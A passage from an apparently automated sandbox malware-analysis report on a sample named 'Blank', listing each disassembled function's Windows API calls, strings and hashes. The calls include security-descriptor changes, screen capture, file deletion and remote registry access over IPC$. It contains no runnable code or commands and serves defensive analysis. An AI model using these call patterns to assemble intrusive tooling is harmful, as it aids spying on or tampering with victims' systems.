                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 002B8BB0
                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002B8BCC
                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 002B8BE9
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002B8BF8
                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 002B8BFF
                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002B8C20
                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 002B8C27
                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002B8C58
                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002B8C7E
                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002B8C92
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3996160137-0
                                                                                                                                    • Opcode ID: 700d9be094573a87a6cccf4934d90ae266d0631fd88a6ffe78194284c7a05291
                                                                                                                                    • Instruction ID: d0a39918d62eef4c8ed484cb3ab0f30cd192921217f0f5a66cf8d59f3de37932
                                                                                                                                    • Opcode Fuzzy Hash: 700d9be094573a87a6cccf4934d90ae266d0631fd88a6ffe78194284c7a05291
                                                                                                                                    • Instruction Fuzzy Hash: 20616DB591020AAFDF15DFA0DC84EEEBB79FF04350F04816AF919A6291DB319A15CB60
                                                                                                                                    Function 002D7A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(00000000), ref: 002D7A79
                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 002D7A85
                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 002D7A91
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 002D7A9E
                                                                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 002D7AF2
                                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 002D7B2E
                                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 002D7B52
                                                                                                                                    • SelectObject.GDI32(00000006,?), ref: 002D7B5A
                                                                                                                                    • DeleteObject.GDI32(?), ref: 002D7B63
                                                                                                                                    • DeleteDC.GDI32(00000006), ref: 002D7B6A
                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 002D7B75
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                    • String ID: (
                                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                                    • Opcode ID: 15c03dc25dc202bc1448b1cca6ea676856fe8a49f7e1e003cbf47b281e28baf7
                                                                                                                                    • Instruction ID: 28cc95a5964062c952d169d76fe3bf1babcbcacc9d1a447fe06d102ba48ed4ac
                                                                                                                                    • Opcode Fuzzy Hash: 15c03dc25dc202bc1448b1cca6ea676856fe8a49f7e1e003cbf47b281e28baf7
                                                                                                                                    • Instruction Fuzzy Hash: B8515975914209AFCB14CFA8DC88EAEBBB9EF48350F14842EE949A7251D635AD50CB60
                                                                                                                                    Function 002CA48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002CA4D4
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 002CA4F6
                                                                                                                                    • __swprintf.LIBCMT ref: 002CA54F
                                                                                                                                    • __swprintf.LIBCMT ref: 002CA568
                                                                                                                                    • _wprintf.LIBCMT ref: 002CA61E
                                                                                                                                    • _wprintf.LIBCMT ref: 002CA63C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                    • API String ID: 311963372-2391861430
                                                                                                                                    • Opcode ID: afe66b443829b24ef1781a4dde44dd5619c3aa5bd634212a26cc93cf76cae6a4
                                                                                                                                    • Instruction ID: 5981da353636efdad85f9e3973ac30286a138631c7a358b8997daebff71d2d72
                                                                                                                                    • Opcode Fuzzy Hash: afe66b443829b24ef1781a4dde44dd5619c3aa5bd634212a26cc93cf76cae6a4
                                                                                                                                    • Instruction Fuzzy Hash: 3951847182111AAACF25EBE4CD46EEEB779AF04344F104269F509B2091DB316F79CF61
                                                                                                                                    Function 002C9710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002C951A: __time64.LIBCMT ref: 002C9524
                                                                                                                                      • Part of subcall function 00274A8C: _fseek.LIBCMT ref: 00274AA4
                                                                                                                                    • __wsplitpath.LIBCMT ref: 002C97EF
                                                                                                                                      • Part of subcall function 0028431E: __wsplitpath_helper.LIBCMT ref: 0028435E
                                                                                                                                    • _wcscpy.LIBCMT ref: 002C9802
                                                                                                                                    • _wcscat.LIBCMT ref: 002C9815
                                                                                                                                    • __wsplitpath.LIBCMT ref: 002C983A
                                                                                                                                    • _wcscat.LIBCMT ref: 002C9850
                                                                                                                                    • _wcscat.LIBCMT ref: 002C9863
                                                                                                                                      • Part of subcall function 002C9560: _memmove.LIBCMT ref: 002C9599
                                                                                                                                      • Part of subcall function 002C9560: _memmove.LIBCMT ref: 002C95A8
                                                                                                                                    • _wcscmp.LIBCMT ref: 002C97AA
                                                                                                                                      • Part of subcall function 002C9CF1: _wcscmp.LIBCMT ref: 002C9DE1
                                                                                                                                      • Part of subcall function 002C9CF1: _wcscmp.LIBCMT ref: 002C9DF4
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002C9A0D
                                                                                                                                    • _wcsncpy.LIBCMT ref: 002C9A80
                                                                                                                                    • DeleteFileW.KERNEL32(?,?), ref: 002C9AB6
                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002C9ACC
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002C9ADD
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002C9AEF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1500180987-0
                                                                                                                                    • Opcode ID: 050cbfc1c64016f1eb0cd78270a29eb105275902a3e9948817e5ab9a494ad2e1
                                                                                                                                    • Instruction ID: 5c94c5c6647e61bd4bdbb5d7e60043884b1a69633b92835898699e413839109c
                                                                                                                                    • Opcode Fuzzy Hash: 050cbfc1c64016f1eb0cd78270a29eb105275902a3e9948817e5ab9a494ad2e1
                                                                                                                                    • Instruction Fuzzy Hash: A8C15BB1910219AADF21EF95CC89EDEB7BDEF44300F0041AAF609E7141EB709A94CF65
                                                                                                                                    Function 00275BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 00275BF1
                                                                                                                                    • GetMenuItemCount.USER32(00327890), ref: 002B0E7B
                                                                                                                                    • GetMenuItemCount.USER32(00327890), ref: 002B0F2B
                                                                                                                                    • GetCursorPos.USER32(?), ref: 002B0F6F
                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 002B0F78
                                                                                                                                    • TrackPopupMenuEx.USER32(00327890,00000000,?,00000000,00000000,00000000), ref: 002B0F8B
                                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002B0F97
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2751501086-0
                                                                                                                                    • Opcode ID: 6b416bd2b2f5c6252aa2615eae07c94e4c63b25ba7eb20ae2c6634e78110f461
                                                                                                                                    • Instruction ID: ca2ac11e43c691ecdf642868c52509568262a4b4a5ee7dc1942f76e50ebe82b0
                                                                                                                                    • Opcode Fuzzy Hash: 6b416bd2b2f5c6252aa2615eae07c94e4c63b25ba7eb20ae2c6634e78110f461
                                                                                                                                    • Instruction Fuzzy Hash: 2471D670664616BEEB228F54DC89FEAFF64FF047A4F104216F5186A1D1CBB1A870DB90
                                                                                                                                    Function 002CAEEA Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 183COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CharLowerBuffW.USER32(?,?,002F0980), ref: 002CAF4E
                                                                                                                                    • GetDriveTypeW.KERNEL32(00000061,0031B5F0,00000061), ref: 002CB018
                                                                                                                                    • _wcscpy.LIBCMT ref: 002CB042
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                    • String ID: L,/$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                    • API String ID: 2820617543-1522443967
                                                                                                                                    • Opcode ID: f94290015b37153478890e0ac70e1da0f9be3f1ec1a07875181b09e9e938ebc1
                                                                                                                                    • Instruction ID: 4a022fc988786260b390a4d9852dc4e7348ac27e2d6e70e37c0652199cb3624e
                                                                                                                                    • Opcode Fuzzy Hash: f94290015b37153478890e0ac70e1da0f9be3f1ec1a07875181b09e9e938ebc1
                                                                                                                                    • Instruction Fuzzy Hash: F451EC302383099BC315EF14C892EAEB7A5EF99344F10491DF495572A2EB719D69CB42
                                                                                                                                    Function 002B83FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00271821: _memmove.LIBCMT ref: 0027185B
                                                                                                                                    • _memset.LIBCMT ref: 002B8489
                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002B84BE
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002B84DA
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002B84F6
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002B8520
                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 002B8548
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002B8553
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002B8558
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                    • API String ID: 1411258926-22481851
                                                                                                                                    • Opcode ID: 20e36b907b859c8419f48814dc09faa4ca4869420e032bba954955065ea88e9b
                                                                                                                                    • Instruction ID: 90926c01f2958853d9a929f7196d851b4007b6b5fc402bdd0ccca0c23b1b3e93
                                                                                                                                    • Opcode Fuzzy Hash: 20e36b907b859c8419f48814dc09faa4ca4869420e032bba954955065ea88e9b
                                                                                                                                    • Instruction Fuzzy Hash: 15410A76C2022DABDF25EFA4DC95EEDB778FF08750F004529E919A2151DA305D25CF90
                                                                                                                                    Function 002E147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,002E040D,?,?), ref: 002E1491
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                    • API String ID: 3964851224-909552448
                                                                                                                                    • Opcode ID: f2b156ae5b49833e0f197968d9a15868dc02ee3bfc365142715dbd5a05642807
                                                                                                                                    • Instruction ID: c0d5b2112ccd8c919d48af31847c4664bcdca2775b263663298926d3a162dc65
                                                                                                                                    • Opcode Fuzzy Hash: f2b156ae5b49833e0f197968d9a15868dc02ee3bfc365142715dbd5a05642807
                                                                                                                                    • Instruction Fuzzy Hash: EE415B346B029ACBCF05EF95D890AEA3324EF59300FA05425FC525B292DB30ED79CB60
                                                                                                                                    Function 002C5882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00271821: _memmove.LIBCMT ref: 0027185B
                                                                                                                                      • Part of subcall function 0027153B: _memmove.LIBCMT ref: 002715C4
                                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000, alias PlayMe,00000022,?,00000022,open ), ref: 002C58EB
                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000,?,00000022,open ), ref: 002C5901
                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000,?,00000022,open ), ref: 002C5912
                                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000,?,00000022,open ), ref: 002C5924
                                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000,?,00000022,open ), ref: 002C5935
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: SendString$_memmove
                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                    • API String ID: 2279737902-1007645807
                                                                                                                                    • Opcode ID: 8a2eeccb9104f7c6816a34b75c1bf36b8872a998725f8c0ea6ab2d7badcea7e8
                                                                                                                                    • Instruction ID: 9aa40c57520a7d63b60c9bd3b0ae048b3e9754c278ed8cc4c592fb5f881f7dc5
                                                                                                                                    • Opcode Fuzzy Hash: 8a2eeccb9104f7c6816a34b75c1bf36b8872a998725f8c0ea6ab2d7badcea7e8
                                                                                                                                    • Instruction Fuzzy Hash: 1111D330960129B9D724A7A5DC4AEFFBB7CEF95B50F400969B415920D1DA7059B0C9E0
                                                                                                                                    Function 002C4C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscpy$#115#116_memmove_strcat
                                                                                                                                    • String ID: 0.0.0.0
                                                                                                                                    • API String ID: 1745391200-3771769585
                                                                                                                                    • Opcode ID: 250c55785ce07d4f091bfcabedab12834a1e3ea5c2f970bca58f6f6f4ae67788
                                                                                                                                    • Instruction ID: cb412bbf1256bc7020fd7b24584ca020fd7f496dbbc86220a389da8efa92278c
                                                                                                                                    • Opcode Fuzzy Hash: 250c55785ce07d4f091bfcabedab12834a1e3ea5c2f970bca58f6f6f4ae67788
                                                                                                                                    • Instruction Fuzzy Hash: A2113D35525109ABD711BB609C89FEB77BCDF40760F0002BAF508960E2EF709AA1CF50
                                                                                                                                    Function 002C5530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • timeGetTime.WINMM ref: 002C5535
                                                                                                                                      • Part of subcall function 0028083E: timeGetTime.WINMM(?,00000002,0026C22C), ref: 00280842
                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 002C5561
                                                                                                                                    • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 002C5585
                                                                                                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 002C55A7
                                                                                                                                    • SetActiveWindow.USER32 ref: 002C55C6
                                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002C55D4
                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 002C55F3
                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 002C55FE
                                                                                                                                    • IsWindow.USER32 ref: 002C560A
                                                                                                                                    • EndDialog.USER32(00000000), ref: 002C561B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                    • String ID: BUTTON
                                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                                    • Opcode ID: b8d625b2d23475e0b2147fb8d21675da9aeecb4c576a28169ba5d01f4cb3d2a2
                                                                                                                                    • Instruction ID: d362911f48fad6e6d1b4d5480640047abf9c16758b5904f3e97aac3237272f7a
                                                                                                                                    • Opcode Fuzzy Hash: b8d625b2d23475e0b2147fb8d21675da9aeecb4c576a28169ba5d01f4cb3d2a2
                                                                                                                                    • Instruction Fuzzy Hash: AC21CD70215605AFE7625F60FCCDF363B6EEB45794FA0552CF001821A2CFB1ACA1CA21
                                                                                                                                    Function 002633E8 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00263444
                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 0026346E
